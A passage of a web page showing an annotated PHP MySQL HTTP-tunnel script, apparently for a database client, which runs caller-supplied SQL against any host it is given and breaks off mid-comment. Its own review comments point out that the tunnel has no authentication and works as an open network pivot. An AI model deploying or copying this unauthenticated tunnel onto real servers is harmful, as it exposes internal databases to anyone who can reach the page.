class="line">542</span><br><span class="line">543</span><br><span class="line">544</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> <span class="comment">//version my202</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//set allowTestMenu to false to disable System/Server test page</span></span><br><span class="line"><span class="variable">$allowTestMenu</span> = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$use_mysqli</span> = function_exists(<span class="string">"mysqli_connect"</span>);</span><br><span class="line"></span><br><span class="line">header(<span class="string">"Content-Type: text/plain; charset=x-user-defined"</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">set_time_limit(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">phpversion_int</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">list</span>(<span class="variable">$maVer</span>, <span class="variable">$miVer</span>, <span class="variable">$edVer</span>) = preg_split(<span class="string">"(/|\.|-)"</span>, phpversion());</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$maVer</span>*<span class="number">10000</span> + <span class="variable">$miVer</span>*<span class="number">100</span> + <span class="variable">$edVer</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (phpversion_int() < <span class="number">50300</span>)</span><br><span class="line">{</span><br><span class="line"> set_magic_quotes_runtime(<span 
class="number">0</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">GetLongBinary</span>(<span class="params"><span class="variable">$num</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">return</span> pack(<span class="string">"N"</span>,<span class="variable">$num</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">GetShortBinary</span>(<span class="params"><span class="variable">$num</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">return</span> pack(<span class="string">"n"</span>,<span class="variable">$num</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">GetDummy</span>(<span class="params"><span class="variable">$count</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="variable">$str</span> = <span class="string">""</span>;</span><br><span class="line"> <span class="keyword">for</span>(<span class="variable">$i</span>=<span class="number">0</span>;<span class="variable">$i</span><<span class="variable">$count</span>;<span class="variable">$i</span>++)</span><br><span class="line"> <span class="variable">$str</span> .= <span class="string">"\x00"</span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$str</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span 
class="title">GetBlock</span>(<span class="params"><span class="variable">$val</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="variable">$len</span> = strlen(<span class="variable">$val</span>);</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$len</span> < <span class="number">254</span> )</span><br><span class="line"> <span class="keyword">return</span> chr(<span class="variable">$len</span>).<span class="variable">$val</span>;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="keyword">return</span> <span class="string">"\xFE"</span>.GetLongBinary(<span class="variable">$len</span>).<span class="variable">$val</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">EchoHeader</span>(<span class="params"><span class="variable">$errno</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="variable">$str</span> = GetLongBinary(<span class="number">1111</span>);</span><br><span class="line"> <span class="variable">$str</span> .= GetShortBinary(<span class="number">202</span>);</span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$errno</span>);</span><br><span class="line"> <span class="variable">$str</span> .= GetDummy(<span class="number">6</span>);</span><br><span class="line"> <span class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">EchoConnInfo</span>(<span class="params"><span class="variable">$conn</span></span>)</span></span><br><span class="line"><span 
class="function"></span>{</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$GLOBALS</span>[<span class="string">'use_mysqli'</span>]) {</span><br><span class="line"> <span class="variable">$str</span> = GetBlock(mysqli_get_host_info(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="variable">$str</span> .= GetBlock(mysqli_get_proto_info(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="variable">$str</span> .= GetBlock(mysqli_get_server_info(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$str</span> = GetBlock(mysql_get_host_info(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="variable">$str</span> .= GetBlock(mysql_get_proto_info(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="variable">$str</span> .= GetBlock(mysql_get_server_info(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">EchoResultSetHeader</span>(<span class="params"><span class="variable">$errno</span>, <span class="variable">$affectrows</span>, <span class="variable">$insertid</span>, <span class="variable">$numfields</span>, <span class="variable">$numrows</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="variable">$str</span> = GetLongBinary(<span class="variable">$errno</span>);</span><br><span class="line"> <span class="variable">$str</span> .= 
GetLongBinary(<span class="variable">$affectrows</span>);</span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$insertid</span>);</span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$numfields</span>);</span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$numrows</span>);</span><br><span class="line"> <span class="variable">$str</span> .= GetDummy(<span class="number">12</span>);</span><br><span class="line"> <span class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">EchoFieldsHeader</span>(<span class="params"><span class="variable">$res</span>, <span class="variable">$numfields</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="variable">$str</span> = <span class="string">""</span>;</span><br><span class="line"> <span class="keyword">for</span>( <span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> < <span class="variable">$numfields</span>; <span class="variable">$i</span>++ ) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$GLOBALS</span>[<span class="string">'use_mysqli'</span>]) {</span><br><span class="line"> <span class="variable">$finfo</span> = mysqli_fetch_field_direct(<span class="variable">$res</span>, <span class="variable">$i</span>);</span><br><span class="line"> <span class="variable">$str</span> .= GetBlock(<span class="variable">$finfo</span>->name);</span><br><span class="line"> <span class="variable">$str</span> .= GetBlock(<span class="variable">$finfo</span>->table);</span><br><span class="line"> </span><br><span class="line"> <span 
class="variable">$type</span> = <span class="variable">$finfo</span>->type;</span><br><span class="line"> <span class="variable">$length</span> = <span class="variable">$finfo</span>->length;</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$type</span>);</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$intflag</span> = <span class="variable">$finfo</span>->flags;</span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$intflag</span>);</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$length</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$str</span> .= GetBlock(mysql_field_name(<span class="variable">$res</span>, <span class="variable">$i</span>));</span><br><span class="line"> <span class="variable">$str</span> .= GetBlock(mysql_field_table(<span class="variable">$res</span>, <span class="variable">$i</span>));</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$type</span> = mysql_field_type(<span class="variable">$res</span>, <span class="variable">$i</span>);</span><br><span class="line"> <span class="variable">$length</span> = mysql_field_len(<span class="variable">$res</span>, <span class="variable">$i</span>);</span><br><span class="line"> <span class="keyword">switch</span> (<span class="variable">$type</span>) {</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"int"</span>:</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$length</span> > <span class="number">11</span> ) <span class="variable">$type</span> = <span class="number">8</span>;</span><br><span class="line"> <span class="keyword">else</span> <span 
class="variable">$type</span> = <span class="number">3</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"real"</span>:</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$length</span> == <span class="number">12</span> ) <span class="variable">$type</span> = <span class="number">4</span>;</span><br><span class="line"> <span class="keyword">elseif</span>( <span class="variable">$length</span> == <span class="number">22</span> ) <span class="variable">$type</span> = <span class="number">5</span>;</span><br><span class="line"> <span class="keyword">else</span> <span class="variable">$type</span> = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"null"</span>:</span><br><span class="line"> <span class="variable">$type</span> = <span class="number">6</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"timestamp"</span>:</span><br><span class="line"> <span class="variable">$type</span> = <span class="number">7</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"date"</span>:</span><br><span class="line"> <span class="variable">$type</span> = <span class="number">10</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"time"</span>:</span><br><span class="line"> <span class="variable">$type</span> = <span class="number">11</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span 
class="string">"datetime"</span>:</span><br><span class="line"> <span class="variable">$type</span> = <span class="number">12</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"year"</span>:</span><br><span class="line"> <span class="variable">$type</span> = <span class="number">13</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">"blob"</span>:</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$length</span> > <span class="number">16777215</span> ) <span class="variable">$type</span> = <span class="number">251</span>;</span><br><span class="line"> <span class="keyword">elseif</span>( <span class="variable">$length</span> > <span class="number">65535</span> ) <span class="variable">$type</span> = <span class="number">250</span>;</span><br><span class="line"> <span class="keyword">elseif</span>( <span class="variable">$length</span> > <span class="number">255</span> ) <span class="variable">$type</span> = <span class="number">252</span>;</span><br><span class="line"> <span class="keyword">else</span> <span class="variable">$type</span> = <span class="number">249</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> <span class="variable">$type</span> = <span class="number">253</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$type</span>);</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$flags</span> = explode( <span class="string">" "</span>, mysql_field_flags ( <span class="variable">$res</span>, <span class="variable">$i</span> ) );</span><br><span class="line"> <span 
class="variable">$intflag</span> = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"not_null"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">1</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"primary_key"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">2</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"unique_key"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">4</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"multiple_key"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">8</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"blob"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">16</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"unsigned"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">32</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"zerofill"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">64</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"binary"</span>, <span class="variable">$flags</span>)) <span class="variable">$intflag</span> += <span class="number">128</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"enum"</span>, <span 
class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">256</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"auto_increment"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">512</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"timestamp"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">1024</span>;</span><br><span class="line"> <span class="keyword">if</span>(in_array( <span class="string">"set"</span>, <span class="variable">$flags</span> )) <span class="variable">$intflag</span> += <span class="number">2048</span>;</span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$intflag</span>);</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$str</span> .= GetLongBinary(<span class="variable">$length</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">EchoData</span>(<span class="params"><span class="variable">$res</span>, <span class="variable">$numfields</span>, <span class="variable">$numrows</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">for</span>( <span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> < <span class="variable">$numrows</span>; <span class="variable">$i</span>++ ) {</span><br><span class="line"> <span class="variable">$str</span> = <span class="string">""</span>;</span><br><span 
class="line"> <span class="variable">$row</span> = <span class="literal">null</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$GLOBALS</span>[<span class="string">'use_mysqli'</span>])</span><br><span class="line"> <span class="variable">$row</span> = mysqli_fetch_row( <span class="variable">$res</span> );</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="variable">$row</span> = mysql_fetch_row( <span class="variable">$res</span> );</span><br><span class="line"> <span class="keyword">for</span>( <span class="variable">$j</span> = <span class="number">0</span>; <span class="variable">$j</span> < <span class="variable">$numfields</span>; <span class="variable">$j</span>++ ){</span><br><span class="line"> <span class="keyword">if</span>( is_null(<span class="variable">$row</span>[<span class="variable">$j</span>]) )</span><br><span class="line"> <span class="variable">$str</span> .= <span class="string">"\xFF"</span>;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="variable">$str</span> .= GetBlock(<span class="variable">$row</span>[<span class="variable">$j</span>]);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">// Prints one table row per environment check (PHP version, mysql_connect()/mysqli_connect()</span></span><br><span class="line"><span class="comment">// availability, mod_security2 when running under Apache) straight to the page; returns nothing.</span></span><br><span class="line"><span class="comment">// NOTE(review): output() is declared inside this function, so a second call to doSystemTest()</span></span><br><span class="line"><span class="comment">// would trip PHP's cannot-redeclare error; the page below calls it once.</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">doSystemTest</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="comment">// Row helper: shows $resStr[0] in green (TestSucc) when $succ is truthy, otherwise $resStr[1] in red (TestFail).</span></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">output</span>(<span class="params"><span class="variable">$description</span>, <span class="variable">$succ</span>, <span class="variable">$resStr</span></span>) 
</span>{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<tr><td class=\"TestDesc\"><span class="subst">$description</span></td><td "</span>;</span><br><span class="line"> <span class="keyword">echo</span> (<span class="variable">$succ</span>)? <span class="string">"class=\"TestSucc\"><span class="subst">$resStr</span>[0]</td></tr>"</span> : <span class="string">"class=\"TestFail\"><span class="subst">$resStr</span>[1]</td></tr>"</span>;</span><br><span class="line"> }</span><br><span class="line"> output(<span class="string">"PHP version >= 4.0.5"</span>, phpversion_int() >= <span class="number">40005</span>, <span class="keyword">array</span>(<span class="string">"Yes"</span>, <span class="string">"No"</span>));</span><br><span class="line"> output(<span class="string">"mysql_connect() available"</span>, function_exists(<span class="string">"mysql_connect"</span>), <span class="keyword">array</span>(<span class="string">"Yes"</span>, <span class="string">"No"</span>));</span><br><span class="line"> output(<span class="string">"mysqli_connect() available"</span>, function_exists(<span class="string">"mysqli_connect"</span>), <span class="keyword">array</span>(<span class="string">"Yes"</span>, <span class="string">"No"</span>));</span><br><span class="line"> <span class="comment">// Only checked under Apache where apache_get_modules() exists; the Yes/No labels are swapped</span></span><br><span class="line"> <span class="comment">// so a loaded mod_security2 is reported as a failure.</span></span><br><span class="line"> <span class="keyword">if</span> (phpversion_int() >= <span class="number">40302</span> && substr(<span class="variable">$_SERVER</span>[<span class="string">"SERVER_SOFTWARE"</span>], <span class="number">0</span>, <span class="number">6</span>) == <span class="string">"Apache"</span> && function_exists(<span class="string">"apache_get_modules"</span>)){</span><br><span class="line"> <span class="keyword">if</span> (in_array(<span class="string">"mod_security2"</span>, apache_get_modules()))</span><br><span class="line"> output(<span class="string">"Mod Security 2 installed"</span>, <span class="literal">false</span>, <span class="keyword">array</span>(<span 
class="string">"No"</span>, <span class="string">"Yes"</span>));</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">/////////////////////////////////////////////////////////////////////////////</span></span><br><span class="line"><span class="comment">////</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Request entry point. A POST carrying actn/host/port/login is a tunnel request and is answered in the</span></span><br><span class="line"><span class="comment">// binary framing (EchoHeader/GetBlock) before exit(); anything else falls through to the HTML tester</span></span><br><span class="line"><span class="comment">// further down, but only when $allowTestMenu is set.</span></span><br><span class="line"> <span class="keyword">if</span> (phpversion_int() < <span class="number">40005</span>) {</span><br><span class="line"> EchoHeader(<span class="number">201</span>);</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(<span class="string">"unsupported php version"</span>);</span><br><span class="line"> <span class="keyword">exit</span>();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (phpversion_int() < <span class="number">40010</span>) {</span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$HTTP_POST_VARS</span>;</span><br><span class="line"> <span class="variable">$_POST</span> = &<span class="variable">$HTTP_POST_VARS</span>; </span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// NOTE(review): this is the only gate on a tunnel request and it merely checks that four fields exist;</span></span><br><span class="line"> <span class="comment">// there is no authentication of the caller. Anyone who can POST here can open a MySQL connection to any</span></span><br><span class="line"> <span class="comment">// host/port the web server can reach, with credentials of their choosing, and run arbitrary SQL. A deployed</span></span><br><span class="line"> <span class="comment">// copy is therefore an open pivot into the network: remove it after use or restrict who can reach it.</span></span><br><span class="line"> <span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">"actn"</span>]) || !<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">"host"</span>]) || !<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">"port"</span>]) || !<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">"login"</span>])) {</span><br><span class="line"> <span class="variable">$testMenu</span> = <span class="variable">$allowTestMenu</span>;</span><br><span class="line"> <span class="keyword">if</span> (!<span 
class="variable">$testMenu</span>){</span><br><span class="line"> EchoHeader(<span class="number">202</span>);</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(<span class="string">"invalid parameters"</span>);</span><br><span class="line"> <span class="keyword">exit</span>();</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Tunnel mode: everything in this branch answers in the binary framing and ends with exit(),</span></span><br><span class="line"> <span class="comment">// so the HTML page further down is never reached for a tunnel request.</span></span><br><span class="line"> <span class="keyword">if</span> (!<span class="variable">$testMenu</span>){</span><br><span class="line"> <span class="comment">// q[] holds the SQL statements to run (base64-decoded first when encodeBase64=1). They are</span></span><br><span class="line"> <span class="comment">// executed verbatim below: the tunnel is the SQL client, so there is nothing to sanitize here.</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$_POST</span>[<span class="string">"encodeBase64"</span>] == <span class="string">'1'</span>) {</span><br><span class="line"> <span class="keyword">for</span>(<span class="variable">$i</span>=<span class="number">0</span>;<span class="variable">$i</span><count(<span class="variable">$_POST</span>[<span class="string">"q"</span>]);<span class="variable">$i</span>++)</span><br><span class="line"> <span class="variable">$_POST</span>[<span class="string">"q"</span>][<span class="variable">$i</span>] = base64_decode(<span class="variable">$_POST</span>[<span class="string">"q"</span>][<span class="variable">$i</span>]);</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (!function_exists(<span class="string">"mysql_connect"</span>) && !function_exists(<span class="string">"mysqli_connect"</span>)) {</span><br><span class="line"> EchoHeader(<span class="number">203</span>);</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(<span class="string">"MySQL not supported on the server"</span>);</span><br><span class="line"> <span class="keyword">exit</span>();</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// NOTE(review): host, port, login and password come straight from the POST body, so this connects to</span></span><br><span class="line"> <span class="comment">// whatever MySQL server the caller names, not only the local one. password, db, q and encodeBase64</span></span><br><span class="line"> <span class="comment">// were never isset-checked, so a partial request may also raise undefined-index notices.</span></span><br><span class="line"> <span class="variable">$errno_c</span> = <span class="number">0</span>;</span><br><span class="line"> <span class="variable">$hs</span> = <span 
class="variable">$_POST</span>[<span class="string">"host"</span>];</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$use_mysqli</span>) {</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$_POST</span>[<span class="string">"port"</span>] )</span><br><span class="line"> <span class="variable">$conn</span> = mysqli_connect(<span class="variable">$hs</span>, <span class="variable">$_POST</span>[<span class="string">"login"</span>], <span class="variable">$_POST</span>[<span class="string">"password"</span>], <span class="string">""</span>, <span class="variable">$_POST</span>[<span class="string">"port"</span>]);</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="variable">$conn</span> = mysqli_connect(<span class="variable">$hs</span>, <span class="variable">$_POST</span>[<span class="string">"login"</span>], <span class="variable">$_POST</span>[<span class="string">"password"</span>]);</span><br><span class="line"> <span class="comment">// NOTE(review): mysqli_connect_errno()/mysqli_connect_error() take no arguments. PHP 7 warns and returns</span></span><br><span class="line"> <span class="comment">// NULL for the extra $conn argument (so a failed connect slips past the check just below), and PHP 8 rejects</span></span><br><span class="line"> <span class="comment">// surplus arguments to internal functions outright. Drop the $conn argument; confirm on the target PHP version.</span></span><br><span class="line"> <span class="variable">$errno_c</span> = mysqli_connect_errno(<span class="variable">$conn</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$errno_c</span> > <span class="number">0</span>) {</span><br><span class="line"> EchoHeader(<span class="variable">$errno_c</span>);</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(mysqli_connect_error(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>((<span class="variable">$errno_c</span> <= <span class="number">0</span>) && ( <span class="variable">$_POST</span>[<span class="string">"db"</span>] != <span class="string">""</span> )) {</span><br><span class="line"> <span class="variable">$res</span> = mysqli_select_db(<span 
class="variable">$conn</span>, <span class="variable">$_POST</span>[<span class="string">"db"</span>] );</span><br><span class="line"> <span class="variable">$errno_c</span> = mysqli_errno(<span class="variable">$conn</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Header carries the connect/select-db error code; actn "C" only reports connection info,</span></span><br><span class="line"> <span class="comment">// actn "Q" runs each q[] statement in turn and appends one result-set block per statement.</span></span><br><span class="line"> EchoHeader(<span class="variable">$errno_c</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$errno_c</span> > <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(mysqli_error(<span class="variable">$conn</span>));</span><br><span class="line"> } <span class="keyword">elseif</span>(<span class="variable">$_POST</span>[<span class="string">"actn"</span>] == <span class="string">"C"</span>) {</span><br><span class="line"> EchoConnInfo(<span class="variable">$conn</span>);</span><br><span class="line"> } <span class="keyword">elseif</span>(<span class="variable">$_POST</span>[<span class="string">"actn"</span>] == <span class="string">"Q"</span>) {</span><br><span class="line"> <span class="keyword">for</span>(<span class="variable">$i</span>=<span class="number">0</span>;<span class="variable">$i</span><count(<span class="variable">$_POST</span>[<span class="string">"q"</span>]);<span class="variable">$i</span>++) {</span><br><span class="line"> <span class="variable">$query</span> = <span class="variable">$_POST</span>[<span class="string">"q"</span>][<span class="variable">$i</span>];</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$query</span> == <span class="string">""</span>) <span class="keyword">continue</span>;</span><br><span class="line"> <span class="comment">// magic_quotes_gpc only exists before PHP 5.4 (the function itself is gone in PHP 8), hence the version gate.</span></span><br><span class="line"> <span class="keyword">if</span> (phpversion_int() < <span class="number">50400</span>){ </span><br><span class="line"> <span class="keyword">if</span>(get_magic_quotes_gpc())</span><br><span class="line"> <span class="variable">$query</span> = stripslashes(<span 
class="variable">$query</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="variable">$res</span> = mysqli_query(<span class="variable">$conn</span>, <span class="variable">$query</span>);</span><br><span class="line"> <span class="variable">$errno</span> = mysqli_errno(<span class="variable">$conn</span>);</span><br><span class="line"> <span class="variable">$affectedrows</span> = mysqli_affected_rows(<span class="variable">$conn</span>);</span><br><span class="line"> <span class="variable">$insertid</span> = mysqli_insert_id(<span class="variable">$conn</span>); </span><br><span class="line"> <span class="comment">// NOTE(review): mysqli_query() returns plain true for statements without a result set (INSERT, UPDATE,</span></span><br><span class="line"> <span class="comment">// SELECT ... INTO OUTFILE, ...), so this branch still passes a bool to mysqli_num_rows() and later to</span></span><br><span class="line"> <span class="comment">// mysqli_free_result(): a warning on PHP 7, a TypeError on PHP 8 that cuts the response short even though</span></span><br><span class="line"> <span class="comment">// the statement already ran. Gating on mysqli_field_count($conn) > 0 before those calls avoids it; confirm on the target PHP.</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="literal">false</span> !== <span class="variable">$res</span>) {</span><br><span class="line"> <span class="variable">$numfields</span> = mysqli_field_count(<span class="variable">$conn</span>);</span><br><span class="line"> <span class="variable">$numrows</span> = mysqli_num_rows(<span class="variable">$res</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$numfields</span> = <span class="number">0</span>;</span><br><span class="line"> <span class="variable">$numrows</span> = <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> EchoResultSetHeader(<span class="variable">$errno</span>, <span class="variable">$affectedrows</span>, <span class="variable">$insertid</span>, <span class="variable">$numfields</span>, <span class="variable">$numrows</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$errno</span> > <span class="number">0</span>)</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(mysqli_error(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span>(<span 
class="variable">$numfields</span> > <span class="number">0</span>) {</span><br><span class="line"> EchoFieldsHeader(<span class="variable">$res</span>, <span class="variable">$numfields</span>);</span><br><span class="line"> EchoData(<span class="variable">$res</span>, <span class="variable">$numfields</span>, <span class="variable">$numrows</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span>(phpversion_int() >= <span class="number">40300</span>)</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(mysqli_info(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="keyword">echo</span> GetBlock(<span class="string">""</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">// Separator byte: \x01 when more result sets follow, \x00 after the last one.</span></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$i</span><(count(<span class="variable">$_POST</span>[<span class="string">"q"</span>])-<span class="number">1</span>))</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"\x01"</span>;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"\x00"</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="literal">false</span> !== <span class="variable">$res</span>)</span><br><span class="line"> mysqli_free_result(<span class="variable">$res</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">// Legacy ext/mysql path ($use_mysqli false): the port is folded into the host string as 